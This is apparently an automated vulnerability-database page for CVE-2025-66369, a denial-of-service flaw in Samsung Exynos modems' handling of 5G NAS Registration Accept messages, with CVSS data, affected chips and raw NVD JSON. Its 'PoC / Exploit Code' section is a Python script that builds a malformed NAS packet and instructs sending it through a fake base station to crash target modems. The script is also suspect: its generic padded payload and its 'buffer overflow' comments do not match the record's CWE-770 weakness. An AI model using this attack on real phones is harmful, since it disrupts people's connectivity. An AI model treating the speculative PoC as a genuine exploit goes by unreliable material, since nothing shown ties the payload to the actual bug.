Security Vulnerability Report
CVE-2025-66369 CVSS 7.5 HIGH

CVE-2025-66369

Published: 2026-05-05 16:16:10
Last Modified: 2026-05-06 20:16:30

Description

An issue was discovered in MM in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, W920, W930, W1000, Modem 5123, and Modem 5300. Incorrect handling of 5G NR NAS registration accept messages leads to a Denial of Service.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Exynos 980
Exynos 990
Exynos 850
Exynos 2100
Exynos 1280
Exynos 2200
Exynos 1330
Exynos 1380
Exynos 1480
Exynos 2400
Exynos 1580
Exynos W920
Exynos W930
Exynos W1000
Modem 5123
Modem 5300

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2025-66369: Samsung Exynos 5G NR NAS DoS
# This script demonstrates the structure of a malformed NAS message.
# Actual transmission requires base station hardware (SDR).
import struct


def build_malformed_nas():
    # 5G MM Message Type: Registration Accept (0x42)
    # Constructing a payload with invalid length fields to trigger the parsing bug

    # Extended Protocol Discriminator: 5G Mobility Management messages (0x7E)
    epd = bytes([0x7E])

    # Security Header Type: Plain NAS message, not security protected (0x00)
    sec_header = bytes([0x00])

    # Message Type: Registration Accept (0x42)
    msg_type = bytes([0x42])

    # Malformed 5G GUTI or spare bytes
    # Sending an oversized string or unexpected IE to cause buffer overflow/crash
    malformed_payload = bytes([0x77]) + b'\x00' * 200

    # Assemble the packet
    nas_packet = epd + sec_header + msg_type + malformed_payload
    return nas_packet


if __name__ == "__main__":
    poc = build_malformed_nas()
    print(f"[*] CVE-2025-66369 PoC generated.")
    print(f"[*] Malformed NAS Packet Length: {len(poc)} bytes")
    print(f"[*] Hex Dump: {poc.hex()}")
    print("[*] Send this packet via a fake base station to target the Exynos modem.")

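References

https://semiconductor.samsung.com/support/quality-support/product-security-updates/
https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-66369/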

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66369", "sourceIdentifier": "[email protected]", "published": "2026-05-05T16:16:10.307", "lastModified": "2026-05-06T20:16:29.870", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in MM in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, W920, W930, W1000, Modem 5123, and Modem 5300. Incorrect handling of 5G NR NAS registration accept messages leads to a Denial of Service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/", "source": "[email protected]"}, {"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-66369/", "source": "[email protected]"}]}}